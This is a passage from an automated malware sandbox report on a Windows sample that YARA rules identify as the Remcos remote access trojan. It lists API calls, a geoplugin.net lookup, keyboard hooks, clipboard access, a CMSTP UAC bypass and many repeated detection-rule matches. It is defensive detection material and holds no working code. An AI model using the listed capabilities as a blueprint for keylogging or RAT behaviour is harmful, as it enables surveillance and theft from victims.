                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,17_2_0041B380
                  Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
                  Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmp, HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001062000.00000004.00000020.00020000.00000000.sdmp, jdSldfVS.exeString found in binary or memory: http://geoplugin.net/json.gp
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpiiB
                  Source: HUED23EDE5UGRFQ.exe, 00000009.00000002.4577861683.0000000001041000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2168229174.0000000002491000.00000004.00000800.00020000.00000000.sdmp, jdSldfVS.exe, 0000000A.00000002.2206237212.0000000003211000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: HUED23EDE5UGRFQ.exe, jdSldfVS.exe.0.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_csv_raportPIPsiVolumTranzactionat_PI.php?zi=
                  Source: HUED23EDE5UGRFQ.exe, jdSldfVS.exe.0.drString found in binary or memory: http://www.opcom.ro/rapoarte/export_xml_PIPsiVolTranPI.php?zi=

                  Key, Mouse, Clipboard, Microphone and Screen Capturing

                  barindex
                  Contains functionality to register a low level keyboard hook
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,0000000017_2_0040A2B8
                  Installs a global keyboard hook
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeWindows user hook set: 0 keyboard low level C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeJump to behavior
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,17_2_004168C1
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,17_2_0040B70E
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0040A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,17_2_0040A3E0

                  E-Banking Fraud

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000009.00000002.4580750131.0000000002B6F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000009.00000002.4577861683.0000000001007000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2185308624.0000000000BDA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 4896, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Spam, unwanted Advertisements and Ransom Demands

                  barindex
                  Contains functionalty to change the wallpaper
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041C9E2 SystemParametersInfoW,17_2_0041C9E2

                  System Summary

                  barindex
                  Malicious sample detected (through community Yara rule)
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 10.2.jdSldfVS.exe.42782c0.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                  Source: 00000011.00000002.2184795000.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                  Source: 00000000.00000002.2170172636.00000000034F6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: 0000000A.00000002.2208800454.0000000004278000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: HUED23EDE5UGRFQ.exe PID: 2820, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: jdSldfVS.exe PID: 6124, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Source: Process Memory Space: jdSldfVS.exe PID: 6996, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                  Initial sample is a PE file and has a suspicious name
                  Source: initial sampleStatic PE information: Filename: HUED23EDE5UGRFQ.exe
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeProcess Stats: CPU usage > 49%
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167B4
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E027C0_2_049E027C
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E9A080_2_049E9A08
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E04480_2_049E0448
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E0DF80_2_049E0DF8
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E0E080_2_049E0E08
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E29B00_2_049E29B0
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_049E99F80_2_049E99F8
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2E7380_2_06A2E738
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2E7480_2_06A2E748
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2E2FF0_2_06A2E2FF
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A263E80_2_06A263E8
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A263DA0_2_06A263DA
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2E3100_2_06A2E310
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2DED80_2_06A2DED8
                  Source: C:\Users\user\Desktop\HUED23EDE5UGRFQ.exeCode function: 0_2_06A2DAA00_2_06A2DAA0
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_0572027C10_2_0572027C
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_05729A0810_2_05729A08
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_0572044810_2_05720448
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_05720DF810_2_05720DF8
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_05720E0810_2_05720E08
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_057229B010_2_057229B0
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_057299F810_2_057299F8
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_057F63D810_2_057F63D8
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_057F634710_2_057F6347
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_057F63D110_2_057F63D1
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB525810_2_07AB5258
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB754810_2_07AB7548
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB000710_2_07AB0007
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 10_2_07AB004010_2_07AB0040
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043E0CC17_2_0043E0CC
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041F0FA17_2_0041F0FA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0045415917_2_00454159
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043816817_2_00438168
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004461F017_2_004461F0
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043E2FB17_2_0043E2FB
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0045332B17_2_0045332B
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0042739D17_2_0042739D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004374E617_2_004374E6
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043E55817_2_0043E558
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043877017_2_00438770
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_004378FE17_2_004378FE
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043394617_2_00433946
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0044D9C917_2_0044D9C9
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00427A4617_2_00427A46
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0041DB6217_2_0041DB62
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00427BAF17_2_00427BAF
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00437D3317_2_00437D33
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00435E5E17_2_00435E5E
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00426E0E17_2_00426E0E
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_0043DE9D17_2_0043DE9D
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00413FCA17_2_00413FCA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: 17_2_00436FEA17_2_00436FEA
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: String function: 00434E10 appears 54 times
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: String function: 00402093 appears 50 times
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: String function: 00434770 appears 41 times
                  Source: C:\Users\user\AppData\Roaming\jdSldfVS.exeCode function: String function: 00401E65 appears 34 times
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2173388823.0000000006A40000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameRT.dll. vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000000.2118623343.000000000013E000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2162131813.000000000072E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2173416724.0000000006ACE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exe, 00000000.00000002.2174742533.00000000075C0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTyrone.dll8 vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exeBinary or memory string: OriginalFilenamegrUk.exe, vs HUED23EDE5UGRFQ.exe
                  Source: HUED23EDE5UGRFQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.jdSldfVS.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.jdSldfVS.exe.42782c0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 17.2.jdSldfVS.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                  Source: 10.2.jdSldfVS.exe.42f0ce0.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.HUED23EDE5UGRFQ.exe.356f910.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                  Source: 0.2.HUED23EDE5UGRFQ.exe.34f6ef0.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
